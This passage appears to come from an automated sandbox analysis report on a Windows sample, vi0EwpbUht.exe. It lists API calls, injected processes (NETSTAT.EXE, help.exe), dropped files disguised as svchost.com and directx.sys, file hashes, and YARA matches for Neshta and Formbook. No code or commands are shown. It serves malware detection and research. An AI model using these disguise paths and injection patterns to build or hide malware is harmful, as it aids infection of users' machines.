          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9540 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8A050 NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8A100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8A04A NtClose,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89FCB NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89F74 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E89F1A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
          Source: C:\Users\user\Desktop\vi0EwpbUht.exeFile created: C:\Windows\svchost.comJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_004046CA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 2_2_00405FA8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041E1D7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409E2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00409E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A920A8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DB090
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F20A0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A928EC
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9E824
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A81002
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA830
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E99BF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009CF900
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E4120
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A922AE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84AEF
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A7FA2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB236
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F138B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FEBB0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A723E3
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009FABD8
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A803DA
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8DBD2
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92B28
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EA309
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EAB40
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A6CB4F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A84496
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009D841F
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8D466
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009EB477
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009F2581
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A82D82
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A925DD
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009DD5E0
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92D07
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009C0D20
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91D55
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A92EF7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_009E6E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A8D616
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A91FF1
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A9DFCE
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00401030
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041E1D7
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402D87
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402D90
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00409E2B
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00409E30
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00401030
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041E1D7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402D87
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402D90
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00409E2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00409E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A420A0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE20A8
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2B090
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE28EC
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AEE824
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3A830
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD1002
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A34120
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A1F900
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE22AE
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ACFA2B
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A4EBB0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AD03DA
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADDBD2
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2B28
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A3AB40
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2841F
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD466
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A42581
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A2D5E0
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE25DD
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A10D20
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2D07
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1D55
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE2EF7
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A36E30
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00ADD616
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AE1FF1
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00AEDFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E44AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E522AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E3FA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E323E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E403DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DBEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAAB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E528EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E520A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E41002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DAA830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA99BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D8F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DA6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E5DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E44496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E4D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E525DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D9D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DB2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E42D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E51D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02E52D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02D80D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236E1D7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02359E2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02352D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A3360
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AAB40
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372CB4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752B28
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA309
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374231B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036D8BE8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037323E3
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374DBD2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037403DA
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BABD8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036BEBB0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B138B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AEB9A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0372EB8A
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03745A4F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0373FA2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB236
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03744AEF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374E2C5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037522AE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037532A9
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A4120
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0368F900
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369C1C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A99BF
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2990
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375E824
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AA830
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03686800
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03741002
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B701D
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037460F5
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037528EC
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B20A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037520A8
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369B090
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751FF1
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037467E2
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0375DFCE
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0370AE60
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A6E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D616
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A5600
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752EF7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B06C0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03731EB6
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03751D55
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2D50
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03680D20
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03752D07
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369D5E0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_037525DD
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B65A0
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B2581
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03742D82
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374CC77
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0374D466
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036AB477
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036A2430
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_0369841F
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036B4CD4
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_03744496
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E8E1D7
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D87
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72D90
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E2B
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E79E30
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_00E72FB0
          Source: Joe Sandbox ViewDropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe 8FCB4C541BDDA7D5CDA8124B48BECBAFBAFE2D82116BD6356D16FF894E1D83AD
          Source: Joe Sandbox ViewDropped File: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe 3D49D6B3360EB03FDD43A4C926213F8B348ABEDE3A5D8B7A4530BF8ED4AE1B72
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 02D8B150 appears 133 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: String function: 0041BDA0 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: String function: 009CB150 appears 136 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 036DD08C appears 48 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 03715720 appears 85 times
          Source: C:\Windows\SysWOW64\help.exeCode function: String function: 0368B150 appears 177 times
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: String function: 00A1B150 appears 54 times
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmpBinary or memory string: originalfilename vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.585454565.0000000002240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000001.00000002.584995806.00000000021D0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000003.324725121.0000000003226000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000002.00000002.336317174.0000000002190000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000003.00000002.464510666.0000000000ABF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: vi0EwpbUht.exe, type: SAMPLEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
